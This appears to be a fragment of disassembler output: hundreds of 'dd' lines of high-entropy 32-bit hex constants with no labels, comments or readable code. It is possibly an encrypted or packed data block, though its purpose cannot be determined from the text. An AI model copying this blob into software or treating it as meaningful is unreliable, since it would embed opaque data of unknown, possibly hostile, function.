		dd 0A32DE081h, 0D65589D5h, 0E4BE15D7h, 4070EED9h, 4D6F645Ah
		dd 89F6371Bh, 4FBF8A1Fh, 469F3A07h, 9B460B92h, 6200B50Bh
		dd 0A40699E8h, 2857AC29h, 0BFD533E5h, 0BBDCC371h, 0F2EA9143h
		dd 0F491EAD8h, 0A80DBF6Eh, 0CBBED295h, 0F1F57202h, 0ED17F1E6h
		dd 2574C5C2h, 4973CEC5h, 0DF7FB2D8h, 0B66D25DBh, 1CAAC44Eh
		dd 7DE8063Ch, 8EC91595h, 0A9CF2DD9h, 95D8F00Fh,	0FA2AA335h
		dd 3D9E61D7h, 0A6F70CC9h, 67834981h, 0D4B9E79h,	9FEC8392h
		dd 97AEE11Bh, 8ED8BFDCh, 0D6864CE1h, 0F581CFAAh, 7772CD8Bh
		dd 5BB13074h, 0F74CC299h, 0BD8F786Bh, 0B40D9D57h, 9468BC45h
		dd 0FFDFB123h, 5BB39D2Ch, 6837AB51h, 0AD3D649Eh, 0DF0F22F4h
		dd 0C67F3C13h, 8882319Ch, 2E59A548h, 0F89EBFFAh, 0F50AC21Dh
		dd 5895A354h, 0B8BDFE17h, 35A5332Bh, 78514CF6h,	45306DA7h
		dd 98F02652h, 0F95F0911h, 6ABD7C10h, 1F7EE851h,	96EFE69Bh
		dd 5D5225BEh, 552C8BF4h, 758E2DD5h, 0B1A497D6h,	1587AD35h
		dd 83B0B7D0h, 0AC45E440h, 448BBA68h, 0AA1C62B2h, 2536A67Bh
		dd 418BD6E0h, 0AB9CAAA2h, 0F59AF78Fh, 256154E5h, 0B95A7847h
		dd 8FF7E762h, 3ABD30BDh, 0BAD9F557h, 0D1B3FCBFh, 0B7A8C22Ah
		dd 50D06139h, 0D95181A2h, 80B7A8E2h, 0D7A0E52h,	66C897A4h
		dd 7D8E4D12h, 24DC7347h, 31921551h, 50D44A63h, 7ABFF7F2h
		dd 24E053E0h, 57A6362Eh, 0E4D8D3EDh, 9C59D9E7h,	0AAA31BE0h
		dd 98598E84h, 913E7EF2h, 9C2AA08Bh, 56BB8F70h, 0EA97A68Eh
		dd 0C45A1F4Eh, 0F49D96EFh, 0F1ADC250h, 964B8C3h, 0D78B9F4Fh
		dd 0BAD5A45Eh, 8BE52DFEh, 2A16B03Eh, 0A40F7B51h, 5BA74D76h
		dd 1EB2377Eh, 4A8D3690h, 41B94813h, 32C22D0Eh, 68556C01h
		dd 0DF8BF6BCh, 0ABFD34F3h, 0ED955738h, 3E84AC4Ah, 0E27B5023h
		dd 6CC6C687h, 0BFBEEBB5h, 0A241BC4Fh, 750BFAA5h, 0EA416AA4h
		dd 80B25FA0h, 2B0E51B0h, 82C3662Bh, 7DA253FBh, 358AF5A0h
		dd 8DA27E82h, 83E9C20h,	6327BD36h, 0E7F84794h, 76271A8Bh
		dd 0A24D2621h, 0D1543CA7h, 487A66D9h, 86FE813h,	0D91A34A6h
		dd 38F6C387h, 5F18A7Ah,	3C54C954h, 82169C74h, 2A535556h
		dd 0AF5A4BF9h, 0EE7023A9h, 42C9D178h, 87AC342Ah, 2FAA7D43h
		dd 0D5E2FF8h, 4EEF3D4Eh, 93947B3Bh, 4AF82225h, 0DE254AFDh
		dd 85A83BB5h, 0CD81D362h, 1CBBD80h, 3D58EF1Eh, 8B58DABAh
		dd 2A7B87E0h, 85855F8h,	0A39C6095h, 19C722DFh, 15C93E0Fh
		dd 3A3FEDFAh, 0E183E407h, 0C74CD4FEh, 3261988Eh, 409E8ADEh
		dd 0DDC35AF2h, 9B116B56h, 0C24AFA73h, 11D30650h, 3B1B724Bh
		dd 205D0FAh, 1996814Ch,	0E399FD28h, 88D6C968h, 0B173C5F9h
		dd 275690F9h, 0E446B93h, 5203D51Fh, 0B1779E79h,	6596CD9Eh
		dd 21E460A5h, 0C85BF455h, 0A06D2BEAh, 673993DEh, 0EE65F26Dh
		dd 6D9E971Dh, 39DEE87Dh, 0AAD75396h, 66553C9Bh,	0A65BBCC2h
		dd 0B453D613h, 0F9A2E59Ch, 0CA62AF9Dh, 1DBFEA90h, 0EC81191Fh
		dd 19BA034Fh, 35F4F36Dh, 85FB38DBh, 0C7379A87h,	0F90ACD66h
		dd 63514CE1h, 542D8DECh, 0A03BFEDCh, 1DD1123Bh,	3B60287Eh
		dd 5CA3D959h, 85142B09h, 0B12D947h, 89326BCFh, 6C2DDFF1h
		dd 0AF04EE0Bh, 0F5AE7B4h, 0B28F65DBh, 0F749B2A9h, 0E87C0A70h
		dd 0CD4A2D1Dh, 0D6FD8A24h, 960C41BCh, 1C725C7Ah, 73F5846Ch
		dd 0C291C7CEh, 4CA978F9h, 1E2F7AE5h, 0D8BA55EDh, 55C6776Bh
		dd 438F7BCBh, 0D24854CAh, 9B29FBA5h, 9AC5AE53h,	4F15A37Dh
		dd 1ADBADD5h, 0AB05085Ch, 7B754E42h, 0DD2DEC7Dh, 0EAFC15FEh
		dd 0DB954FF1h, 4ECF70A0h, 0C145F2FFh, 0B3F05897h, 20DB3EADh
		dd 419E22Bh, 56BBE72Dh,	3A9C23ADh, 4B03BD4Ch, 0E169FB78h
		dd 5ABDDBDFh, 0D2DD1B19h, 6BC5B0AAh, 0E797C4A3h, 8EFFA53Fh
		dd 1FAD3C08h, 832C39C7h, 0F973F0DAh, 429E237Eh,	0FF141F73h
		dd 0E789E101h, 0FEBDF7AAh, 59AFAC92h, 0A3803D63h, 0C9BBD27Ah
		dd 88CBBB3Eh, 6E778034h, 9AB459BCh, 0C1F0F0AFh,	1C877423h
		dd 0F52BE4h, 0FD1069DEh, 6C1A7D7Eh, 303CF350h, 530AB873h
		dd 6B741A04h, 8C5C454Ah, 0B7BF694h, 83D85791h, 4BDA6E93h
		dd 8B991F16h, 4B76534Dh, 6C0F19E1h, 0B4513CEEh,	0ABAAAB51h
		dd 0DBA98CCFh, 0A4BE986Bh, 66E974F1h, 216867CAh, 968E2AA6h
		dd 6EDE9270h, 2B4EA74Ah, 74A9B4BEh, 0B3BD9B49h,	0B703DA2Eh
		dd 0F38A34BEh, 6B278EAAh, 0FC44F5E2h, 0F9B4A910h, 0D53C97Eh
		dd 2DAFE5CEh, 86EBFABEh, 528287E3h, 6A5E0D4Dh, 854D06E7h
		dd 0BE1CD75Fh, 3C103CB9h, 5C31F8C5h, 5603FC61h,	0EBF68E6Fh
		dd 0C3BC68B7h, 0F8DE5C0Ah, 77AE6B1Eh, 359D658Dh, 0AFCFC556h
		dd 4E02FC40h, 2FF60E48h, 62F4A5A2h, 6984A9E3h, 0EE5762FCh
		dd 521F5338h, 6DC0AB8Fh, 0D98D8DADh, 0E38E8317h, 25C9F54Dh
		dd 673048DFh, 0BD8E8592h, 6EB93D69h, 7F2E99A3h,	4A602383h
		dd 742BA998h, 0B4F9ACA8h, 0B29156BCh, 3B02A684h, 9475C4BCh
		dd 903B92D1h, 0B381F826h, 0A0B3942Fh, 3A6CF842h, 0ACD8DBA0h
		dd 0CEE4F935h, 2D691840h, 115CE02Fh, 0D0F945CBh, 122D7E9Ah
		dd 5DE55B44h, 9EB48E0Bh, 0D7B9A5F4h, 0D2FD4A6h,	1D5F580Ch
		dd 40074F21h, 87030D29h, 0DF2E1A0Ch, 0A897CAB7h, 1E40BDB6h
		dd 69599BBFh, 0B5B7B931h, 63C33687h, 28CE02CEh,	0C545D370h
		dd 85487F6Ch, 0F8577F6Eh, 4E9CF2A1h, 98688AADh,	0AB5B80ABh
		dd 5EDCB51Ah, 75517E23h, 954635A3h, 89FFA1CBh, 0FC7481DFh
		dd 6B7222A5h, 0E07458C5h, 14A7A1DCh, 4C1E383Fh,	1D69F75Ch
		dd 4391BE1Eh, 6648AC9h,	0E46D147Dh, 7C645E71h, 35AAD236h
		dd 0F55019F0h, 9FB8C317h, 0AEAC6C93h, 83C71863h, 66EA8C1Fh
		dd 4E82A251h, 0E726D077h, 0FB1734E1h, 0F5D16B98h, 0B376F065h
		dd 6018E5CCh, 856F889Fh, 0FA62E459h, 2C7DD547h,	0F696FD16h
		dd 0F86683AEh, 88B5DCC2h, 6E5B26D4h, 0CF17C1F1h, 687C4D7Fh
		dd 7FF5E765h, 5770CFA9h, 0CF88DA84h, 0D3C8CC24h, 0ECB807BEh
		dd 540EB42Eh, 0D5571A42h, 9A27DD78h, 97F2D6F2h,	0C05DEA0Dh
		dd 22DC8D7h, 9199B1EEh,	0F772C61Eh, 96F9F00Ah, 77D4812h
		dd 12AB637Fh, 8EDE31A9h, 0ECFF7F35h, 11F79CE1h,	0CD333BA7h
		dd 5052B338h, 5F079F45h, 1CC2D8E8h, 7F9C8D1Dh, 0B75EB1A9h
		dd 0AAAA7F33h, 6C5AA460h, 71BE818Ch, 12A6713Eh,	0FADD6D77h
		dd 84DD0285h, 0A68EC4C2h, 0A1A7D6B7h, 0FEF4BEE2h, 5431B4D5h
		dd 0A4A664CFh, 7ACE934Dh, 87BDFAEAh, 0C79BC4A3h, 43C72E52h
		dd 1BC89974h, 40521153h, 55C643BFh, 0F157AFE5h,	362FF643h
		dd 977AABC0h, 0B61DB599h
		dd 0A86A667Fh, 250ACADAh, 0EDFE412Dh, 22EBAC2Bh, 6A60C734h
		dd 0FB523F51h, 0EC1F12BDh, 0E76BA71h, 42C51320h, 1A5588E5h
		dd 0F8598976h, 0C9E22CB8h, 0D8ED3254h, 83971C32h, 783E2286h
		dd 3DD3208Ch, 86E38DC7h, 0D4FC89D2h, 1976C778h,	82BFBD1Eh
		dd 1ECA521Dh, 9565884Ch, 66AFBFA1h, 0F7B70D07h,	0DDA6882h
		dd 1E1430C1h, 0D777C214h, 0EF1343E8h, 0FDFA1E27h, 71BE63B7h
		dd 430EB2BFh, 0D2737F7Bh, 0A8A57C8Ch, 3D0DEFBCh, 0CC04758Fh
		dd 9BFD76C2h, 0E80B5202h, 7A050245h, 27B82337h,	742A0460h
		dd 0E61CD007h, 5C26D18Dh, 731D6806h, 21180273h,	3DC64612h
		dd 0A3247301h, 699EA02Fh, 20D11384h, 0A30E9F8Ch, 49A8A68Eh
		dd 51873D1Ah, 6346DC4Dh, 19611A30h, 40D5142Ah, 0F30BA7CCh
		dd 2A70AA6h, 72B91D18h,	93396B59h, 6536F2ADh, 214D1F8Ah
		dd 1E6F2EE8h, 0E395116Ch, 0B63DAB2Eh, 9C6CBA4Ch, 0A29C8311h
		dd 2EB2D815h, 7811F5F4h, 0E87EAECAh, 415A69D5h,	0C942139Dh
		dd 5679289Ch, 0ED1CEB96h, 2A64F955h, 0A8EDAE7Ch, 45F4AB33h
		dd 0FD5E3F17h, 0D0C37837h, 0EEF6740Dh, 75A09E3Ch, 0F66B0B6h
		dd 25537F1Ch, 0E74273ACh, 0FC15AB98h, 2985F3D2h, 0F513A309h
		dd 7DDE7456h, 0FC79ADC4h, 4AEB2B59h, 97FBCE3Ch,	5D5EA9F0h
		dd 0C0DCBE5h, 5DA2C704h, 0D5AE7FF9h, 0D4BEF4D1h, 0FD295C90h
		dd 7F73065Ah, 288BCCE0h, 7D9D8871h, 0A0E9D5CBh,	0C0313BE0h
		dd 4E7EBDB3h, 5A3AFF62h, 0A7EA2D1Ch, 109BF7CAh,	0DDD22AEFh
		dd 273A8568h, 0E0D15CE1h, 9CBA6B81h, 90BBB31h, 0A3F7D7B2h
		dd 37EE39C6h, 751B7CD1h, 5B57837Bh, 70468D2Eh, 0DE6BCA57h
		dd 7CAFD21Fh, 6F33F8BEh, 0D359CF34h, 0FE893C97h, 7FEB4EFAh
		dd 20CFC47h, 0E4CB55F8h, 0E3F38C6Bh, 2633829Bh,	713B8F0h
		dd 0B7662AE4h, 0D6D21634h, 0DCECB52Eh, 19402105h, 0E4A81F61h
		dd 920F8F49h, 83A1583Bh, 731603FDh, 7E3377E5h, 471BDD08h
		dd 0A5AB08BFh, 0F2E0CEDh, 4EB3ACEh, 7E3616EBh, 5D086751h
		dd 0D59CA70Fh, 0D619A27Eh, 7CFFED5Bh, 0D27C8FE0h, 0B29CECE7h
		dd 0CD105F9Fh, 0D80BD1B8h, 0E95EB015h, 0DA1DCA46h, 8AB516FBh
		dd 6E659AB4h, 0E6633904h, 741835A9h, 64ED91B2h,	6D3FDE1Ch
		dd 49FC7AE5h, 2A4A429Ch, 2F57A64h, 56DCCF1Bh, 0EB47A6BCh
		dd 33988AD8h, 0F6D7CBB5h, 525281EDh, 646A9D5Fh,	217712C8h
		dd 1D9B4CCCh, 0AF463EA7h, 0A3CF077Dh, 95859D54h, 0B55B978Bh
		dd 4D5D18h, 0F764D6ACh,	5D0854A5h, 7B401DBFh, 0C492464Ah
		dd 1D91C8B5h, 2F777562h, 7B8F11ECh, 1D006ADDh, 77F45F0h
		dd 7230587Eh, 7A6D1877h, 0AB001E6Bh, 0AE57E0EEh, 5BC0DC75h
		dd 328F4B87h, 1F89F8FEh, 15CE5DDEh, 296BFC7h, 0B47F5353h
		dd 0B9E0F577h, 6ADC6213h, 630F14CDh, 0FC691E7Ch, 4CFD28C0h
		dd 2E9B0A9h, 0BED0B5A7h, 633770DFh, 1413A9DCh, 0FDABE553h
		dd 80ECFAEDh, 98CCA49Eh, 97EE3A6Ah, 0F0C0FF6Ah,	8BD77DC8h
		dd 0CA637EBEh, 0F0DCB4DCh, 0FFF57B3Bh, 502BC8E9h, 157F63FDh
		dd 958B74BFh, 40E652EEh, 1BECD0E6h, 42D36171h, 0AB8B01AEh
		dd 935FC1F2h, 0F4EB9A2Fh, 89BD6861h, 6C12AB5Eh,	3F058731h
		dd 0B4B208B4h, 2816268Ch, 52CDE852h, 0BD232940h, 8360A72Ah
		dd 68D34F3Dh, 0F76762A1h, 49F3C6F3h, 2C4AA056h,	54FFD76Eh
		dd 2D58BB4Bh, 0AF514838h, 0EB7B4D73h, 68D82C32h, 0B586FAA7h
		dd 0BD55C064h, 0DE02795Ch, 3CACEA74h, 9DA8535Ah, 549183Eh
		dd 9ABDC6EDh, 0E62E055Ch, 8CFCF36Bh, 0E439FAA1h, 6AC815B8h
		dd 0F2EEEC9h, 2642AE14h, 0F4E75AE7h, 9E7FD5BBh,	777DFC35h
		dd 19F58219h, 60DA0014h, 0A5269B10h, 17F6E26Ch,	0B1B6BF84h
		dd 97CF8EB2h, 0F086919Bh, 6055A26Bh, 8272B45Fh,	0EF468E40h
		dd 59EEBDFCh, 93415B83h, 9A867EE0h, 760F1CD3h, 0B74CF003h
		dd 0A8289B51h, 28DCA451h, 7F1440EAh, 0ABD2F9C1h, 4DB4C28Eh
		dd 8D4863FDh, 27E23230h, 0B3B94ABh, 0E960FE73h,	8E7F8Eh
		dd 8F12E6B5h, 0D6C255FDh, 7E524E0Fh, 0FF732387h, 0FD889FC3h
		dd 0D8DB0C82h, 0B45089BEh, 9198051Ah, 60DDFB14h, 97E46D61h
		dd 337C98A8h, 0D03BFCF7h, 36BD70D0h, 1ED1ED9Dh,	2FF36B55h
		dd 8A2207CBh, 45A3E131h, 47DE587h, 3DB5F17h, 2FAA666Fh
		dd 0BA3E9EC4h, 1CDBA4E2h, 2CD5C0AAh, 0C05B13E7h, 0AA9BD82Fh
		dd 4A6828EEh, 6C0709EDh, 0D255D546h, 4A292BA4h,	0FB8E1868h
		dd 0A72B0EC0h, 7733FDF6h, 6AA10AAFh, 0CDCDC12Ch, 1C2FCAA5h
		dd 5CADC86Ch, 7DF5D3A8h, 37F11412h, 6E275C6Fh, 4905F0F1h
		dd 1FC8F444h, 5BE7E557h, 0FC00DBAh, 0D0DA0793h,	5FEBFBE3h
		dd 7278DF19h, 0A3E1275Eh, 53CB98CDh, 861E52F3h,	6EC515FDh
		dd 5358E76Ah, 82FA2E65h, 46C0346Ah, 5E695114h, 0B3D8645Dh
		dd 0FBBB2098h, 0B20CB471h, 7D1F997Ah, 3E988F60h, 67571B77h
		dd 0F09794B6h, 0BBCCB440h, 0ADED4E1Ah, 0D24EB15Dh, 0EA2CF7A5h
		dd 6D3DDB9Fh, 0AE084BEBh, 3CECD58Dh, 22D7A2DFh,	0ED14AD76h
		dd 0F9FEAE52h, 0ADE468EEh, 67031838h, 477B6F96h, 1857F0D7h
		dd 0FED5605h, 7CD7679h,	0AFBCBF14h, 2F5D245h, 8DFA35F0h
		dd 0B10976F0h, 0B42D983Eh, 0DA1B9FB3h, 0FCE2FCADh, 1689743Ch
		dd 0FBBF4004h, 4712251Ah, 0D9835723h, 750F0945h, 954F8DB3h
		dd 5FA7C4D0h, 505BE199h, 14CE0941h, 0F9CC75BCh,	0F59D3250h
		dd 0C3DC19DEh, 0BA711ACEh, 0D3F70CBBh, 16C7CFECh, 61958E09h
		dd 0EA0E1D76h, 16D88C8Eh, 0F6885F8Dh, 0A2ADCCB1h, 0AAB5CDB9h
		dd 7FBEBB93h, 70EA9B38h, 0FFA599A0h, 4967D7F4h,	9AD67B9Dh
		dd 65421555h, 0AA83DCDBh, 0FC8C7408h, 98981391h, 0DE0879E7h
		dd 3BDA0E1Fh, 0D1F105EFh, 7F4FCB4Dh, 0AD114F59h, 12FEFC04h
		dd 0B9503B8h, 7587AD47h, 0A1F773A4h, 8BC9C2A1h,	715D2BCEh
		dd 48A94152h, 0DB7B656Bh, 97438607h, 9BC4BF4Ch,	0BF7CCDF7h
		dd 0EEDAF9D1h, 6B4D2CC3h, 3689349Dh, 918D74EBh,	8631B7B9h
		dd 3031419Fh, 86FD426Dh, 0D6257CACh, 81FDD79Dh,	7DFBD5CCh
		dd 282A2B42h, 0EF9E8554h, 5844FF2Eh, 0E0F15FC5h, 9B74871Ah
		dd 0CDE061EEh, 0F7C727C9h, 26FF55A0h, 0DEA86DDh, 0EA336E3Fh
		dd 2EE148C3h, 5E611389h, 0FF4FBBF9h, 4977493Ch,	0D08C886Ch
		dd 0AACA6FF5h, 174FB2E0h, 8BD5AB93h, 0B7D489CDh, 0B0E4A250h
		dd 0E94A454Ah, 35DAC094h, 0D86B8D2h, 412FAEDEh,	0DFE5E26Bh
		dd 88AA325Ch, 2EDBC3C2h, 0BB288C65h, 0E9DE6AD2h, 0A3DE5094h
		dd 470229A4h, 6B4CEA89h, 900A4FFCh, 9060EA38h, 0E88961B6h
		dd 38AAE6D0h, 2564D7CCh, 45CBF734h, 6E52B947h, 696A61E4h
		dd 5FB0A8DDh, 40D1591Eh, 0C86AA74Eh, 2B423685h,	0AF326CECh
		dd 774815CEh, 0FABF4B3Bh, 2D677E3Bh, 0D3350F6Fh, 78AA7D96h
		dd 76031CCFh, 0F1F605C1h, 4485EDC0h, 5AA0D1CEh,	0D2C57040h
		dd 4CBC4A04h, 233D5DB4h, 0B178FF7Eh, 7BFB2DCEh,	51357291h
		dd 0D9E18D33h, 7B0795E6h, 7F29682Bh, 0B4D6F9D0h, 2A2F21A9h
		dd 6A776BEDh, 8AA95ABBh, 0D0024705h, 0C30F1B71h, 883F0C8Fh
		dd 0B3DCC01Bh, 5264E7E0h, 4952D5DAh, 0D5D89B4Ch, 0ACE4F640h
		dd 7F1672CAh, 0BA5B43F1h, 2F549D76h, 9D8E57F6h,	95963566h
		dd 0E51B9AD7h, 0E4CF0752h, 95F92FC0h, 301324D8h, 28790E50h
		dd 5BA638A0h, 846CA5D8h, 0D8266DC8h, 89DF5355h,	71A8969Fh
		dd 0DDE97F1Eh, 3B9F9CC0h, 2FF2C87Ah, 250EFBD3h,	0AEB91F3Bh
		dd 54DA1969h, 5ABB9933h
		dd 81098403h, 66B0A707h, 0AA20A82Bh, 5BAF959Eh,	8DC2166Dh
		dd 3D4CDC14h, 9517FE0Dh, 92CCB3E8h, 0CCAFD25Ah,	0E61DC3FBh
		dd 25381F3h, 2992B29Ah,	43B92B03h, 0FC13AEB8h, 5437DF37h
		dd 13D65C1Eh, 143B026Bh, 0E5CBD0EEh, 333B1EEDh,	0D81BA4CBh
		dd 0BF1CE4D6h, 7A44E1CFh, 52D11096h, 0E036BB3Dh, 0F8C89BB9h
		dd 7FE18EA0h, 53EDEBE6h, 6422EDF9h, 66091FCBh, 9A9DBB5Fh
		dd 0F7F34B9Bh, 0A16B17FBh, 3BBC8671h, 901573E0h, 90FFD271h
		dd 0CF9B42D1h, 9BC3D73Eh, 3CDB9A29h, 310FF2B0h,	9C878472h
		dd 3E0C7AA2h, 9FC058DCh, 935B1AEBh, 0B9CEF3F8h,	4EAE2FACh
		dd 50AC856Eh, 0B2387FEFh, 173171F0h, 6D0087ECh,	0B61C10A9h
		dd 91D50C3Ch, 12DD9376h, 8B0EC5AEh, 0B856CA14h,	3559A83Fh
		dd 0CB5BB7A1h, 0A83140A1h, 6B3AE684h, 0B49717E1h, 547DC96h
		dd 0EF79092Eh, 699B03F6h, 21AF97h, 4394AAD3h, 21D90126h
		dd 0C6EF87E2h, 62EAF6EAh, 58FE92DDh, 0B7A190FAh, 0C9F15C6Ah
		dd 0ABA6E60Dh, 43F1E178h, 0A12336CDh, 7CE9A4AEh, 0F521E6D1h
		dd 0D0AE3AB5h, 747875B1h, 0F7EA46A0h, 0EBE54237h, 0E64BF93h
		dd 587FC75h, 0CEF96A45h, 7F83E33Eh, 2FBB645h, 12AEE7FBh
		dd 0BBAA0D6Bh, 9CBB72D0h, 4FCD85D6h, 0FD9BA974h, 71AA6B86h
		dd 0E2BC01F6h, 319C0B9Ch, 8539C8BCh, 99B40F76h,	1515A9C9h
		dd 0ACAA92D3h, 0A2FFF513h, 13797DADh, 10C5B13h,	153EA52Dh
		dd 9C922BA2h, 3B9A7B26h, 8DF21A93h, 0D8FE138Bh,	6053B83Ch
		dd 0AA0815D4h, 0A95D1F2Dh, 16FBAC2h, 6C9F4472h,	14FB270Ah
		dd 78DD3EEh, 0E0CA8C36h, 7D1D89E7h, 0E5CEBEECh,	1F6F7EDAh
		dd 0F075C22Ch, 83B63A05h, 157989E2h, 88FE89FEh,	3E3E7834h
		dd 0C902F0F0h, 0D65494CAh, 52FE2FCBh, 0AD3BADFh, 2373B374h
		dd 0EDEEA801h, 0AEACFD45h, 1E69836Eh, 0DB00631Bh, 0AA4EE26Ch
		dd 3BDCC39Eh, 0D52D5BCFh, 83EB3FE8h, 0D93C12FDh, 27978804h
		dd 0C2A48114h, 5ECCAC9Ch, 0D689F9FFh, 0C7B1E02Ah, 9E3F0EA6h
		dd 0AEEC7472h, 0C85C493h, 8C0FDA2Fh, 0B0F7623Ah, 0DB5BEECFh
		dd 0A652F8Dh, 35BEA76Bh, 84BFB5E0h, 81F79CB5h, 0D94DE710h
		dd 0AB03F03Fh, 48AD62E2h, 1906BA7h, 51DD620h, 0F63C421h
		dd 63A9A695h, 0F22D52B4h, 6D5DFAA7h, 8FCD3E0Eh,	0CC3FC5F5h
		dd 978C3EAh, 4A9DD82Eh,	6066AB32h, 95CF7FCFh, 922DA987h
		dd 0C486598Ch, 88D76281h, 0D5375D4h, 8BA05FC8h,	0A86E7D40h
		dd 3309C93Ah, 0A61F457Dh, 49789499h, 9658BE0h, 0CA15A9BBh
		dd 4E6020BFh, 0B2D59690h, 0C5707D55h, 0B0A5A277h, 368C4744h
		dd 3292C8F2h, 0B770D514h, 0F5E82E9Fh, 0A057D682h, 0D07C9A61h
		dd 0AE75E18Eh, 0BBB2ED14h, 0AFC53BF4h, 0FB680D1Ch, 26DB323Fh
		dd 89DD507Ah, 23490DE5h, 0E3851773h, 0C49D64FEh, 0ECA864C9h
		dd 72BC73EAh, 65F20ACCh, 0E22106B1h, 7D212ED2h,	0C979E044h
		dd 16FA0F2Fh, 0CADD5203h, 0B0372A61h, 0C1E40575h, 0D3C98697h
		dd 3BCC4342h, 0CE4D2A2h, 46DC36CDh, 0A17A35D5h,	0AF597399h
		dd 0A9079743h, 453208CBh, 0EA908F86h, 345EA25h,	0E27C51D9h
		dd 0A676602Ah, 0C12F850Eh, 0C5AFD153h, 7AE3D95Bh, 38BA50ACh
		dd 0A7683012h, 0F8586F82h, 52479AEAh, 6C4A7558h, 71D93838h
		dd 0C280B2h, 0EBC5CF68h, 5FB2532Eh, 0B7664376h,	7CA87402h
		dd 650EB3CDh, 67C0E3FFh, 9CCE1DA2h, 0D4268870h,	62E799FEh
		dd 571F26CEh, 0CA3F19F5h, 1D6ABA66h, 775E7F6Ch,	0FA0A5573h
		dd 0E3DBA0CAh, 2B0B5B3Dh, 0EF6A549Eh, 7D2CA4E2h, 0A5F15BECh
		dd 0DF9DE884h, 66D5FC0Fh, 921E8BA4h, 2721DEF2h,	5A0036A8h
		dd 3E28F077h, 4AF6C638h, 0BBC4D096h, 6E2715B9h,	11B90A54h
		dd 3E27175Dh, 0B939BD56h, 5884FA69h, 0CC2B8FD6h, 5A24F44h
		dd 744F873Bh, 983C5F58h, 50F38B8Bh, 570AC8B9h, 0F5DD3FC5h
		dd 49F061Eh, 0FDFD7D51h, 0DD8E7A1Bh, 997F94CCh,	0A8829264h
		dd 23A713C9h, 3413E1D4h, 317DDB8Eh, 0EB722C1Ch,	0E5F21145h
		dd 0F28A0BBBh, 60586B7Ch, 63BF6C6Bh, 1CC44323h,	0C0582FBDh
		dd 4B8451EAh, 0EE38BF87h, 18BADEB4h, 96EF3DBDh,	0AD83CF13h
		dd 745B5D32h, 0A85A15B9h, 4A9513C2h, 6F1335F4h,	58DE0175h
		dd 1F837022h, 0F0456CC6h, 9448CB2Eh, 57CF3CCCh,	0A791C5C2h
		dd 49D887E2h, 7DA227B3h, 8DD5502Ch, 14C1763Ah, 17E85D24h
		dd 4DB19DE4h, 3C13EBB1h, 0C0FB2BEFh, 3E6C43F2h,	38BDBD91h
		dd 6D616843h, 9969846Fh, 78D92FE7h, 90FCBDFBh, 0DAEA6D33h
		dd 83227705h, 35FCDAA9h, 1A6B0EEDh, 79F5D465h, 63F09CB4h
		dd 707DB63Ch, 7D9794BDh, 0E7B831CFh, 5F7C7554h,	3A23A338h
		dd 0A5E7A5A3h, 0EBF1D983h, 0C4857968h, 0BB3990B5h, 0AE278FA3h
		dd 0B0386D7h, 0E3FAC99Fh, 6985EFB9h, 21F3B115h,	17708E67h
		dd 0A138A068h, 7B8F5E84h, 95E00B45h, 5812B8DCh,	0C5EF1A0h
		dd 90AD9B4Bh, 0C065B2C9h, 0E4E813E1h, 0FB2EF91Fh, 99B43D12h
		dd 5A91ABDFh, 0AADE2E48h, 0A8085B7Bh, 29D5A5FFh, 599B95Ch
		dd 4727526Bh, 9A85445Dh, 3F1E68B2h, 0F5EC4BF0h,	845037CFh
		dd 0D1AD4B61h, 5643161h, 0CFC23765h, 12352B03h,	92BADB32h
		dd 4C99FA58h, 624E8C16h, 0D432FBF0h, 98F57237h,	0ABD2AA1h
		dd 444274E1h, 0A3832D4Bh, 0F4D6E7B8h, 0DB26F92Ch, 9D95A4FBh
		dd 0F8B6185Ah, 0EB7B5550h, 0F65D9FE6h, 36D9D3B7h, 0E33B5BADh
		dd 19CD2B1Bh, 0F07CF77Dh, 0DF0E9ECDh, 50FED168h, 0AAA9D16Eh
		dd 0D146D938h, 0E39EBF52h, 0EAB746D4h, 5692B925h, 375E1596h
		dd 0C39DA643h, 50F9CB14h, 0BEFA5677h, 74455A39h, 6707DFA9h
		dd 0C094DA2Bh, 0B4BC8718h, 26E4CB69h, 29D97B47h, 0D901B3BDh
		dd 0A8442FB9h, 4B99110Fh, 5B18DD49h, 13C9FBCBh,	5C38F48Eh
		dd 0CBA7529Eh, 0A1F28A01h, 6F7791C3h, 9809B658h, 908C6677h
		dd 83ED857Eh, 7BB0D34Bh, 0B1F28FE0h, 0EA30891Fh, 2A189163h
		dd 8AEDFC5Eh, 0E26E143Dh, 95431306h, 0A10EBE51h, 2D08DA60h
		dd 0B71631EBh, 0EB745822h, 5353A035h, 452AEA58h, 3612D779h
		dd 99E11C6Eh, 8625AAFFh, 0B5C75519h, 0B5C05DC3h, 6DD22EBFh
		dd 0DB45A1D8h, 86617079h, 13FC141Dh, 0EDD621D1h, 68E961E2h
		dd 7B6323E8h, 0D197B709h, 0CD604A1Ch, 3CAD2DA1h, 0F4167F3Ch
		dd 93BC769Ch, 15EDA52Ch, 768FF7C0h, 46EA4BEBh, 0CDA2D1Bh
		dd 22EE4EAFh, 0C8AF1FB6h, 77D941C0h, 2DB2C950h,	3ABBC290h
		dd 9BF8B913h, 9AE75D82h, 0E952A192h, 0B41B7F99h, 8E2A8893h
		dd 0EFE2AF1Eh, 0B3C56C08h, 0CE7C98DFh, 23DAF698h, 71EB8D8Ah
		dd 0D37728E7h, 0DFE9EA12h, 0F015CC2h, 2EE90DA7h, 6ED07959h
		dd 44EF844Bh, 32BF4409h, 94A43F61h, 0D122C870h,	0F1F5155Eh
		dd 0B146F70Ah, 0E70ED76Eh, 0E57D9DA0h, 9D8598EAh, 57AEA3F8h
		dd 0B1DA11A4h, 5C572B7Fh, 391012D5h, 49B17E5Ah,	983DCAB3h
		dd 0A54DD413h, 0BB8BF72Dh, 0A4D907AAh, 662A2C2h, 0DFCB2BAEh
		dd 34CC97F8h, 77B332BAh, 28BD3F69h, 52ACD526h, 0F48C7D4Bh
		dd 9FABEE3Ah, 0DABCE3ACh, 0B20794B8h, 0A9C117B5h, 0AD1175B9h
		dd 2792E145h, 0BE7E524Fh, 1E59F430h, 75796A18h,	288ABBECh
		dd 0F6223366h, 3FABA0B8h, 0D5A67EEBh, 10642BECh, 2D933DA5h
		dd 0C78B8DC0h, 0C21ECDBDh, 0BE7A9592h, 9694B6A2h, 59558C1Eh
		dd 0FECBAE37h, 6FCACC9Dh, 0B85C2A4Fh, 0D2D7E7DAh, 81ACA1F8h
		dd 0BC15D070h, 0E265A8ACh, 37FC6E69h, 1B998B6Eh, 57FD7236h
		dd 9EBD264Eh, 7FF8A7C2h
		dd 1871B33Dh, 0DE8DF424h, 0FB04BFC5h, 4C704EB6h, 185AB6E5h
		dd 23A998D3h, 25DE4523h, 0F05C9046h, 0BED4FC43h, 0D37038AAh
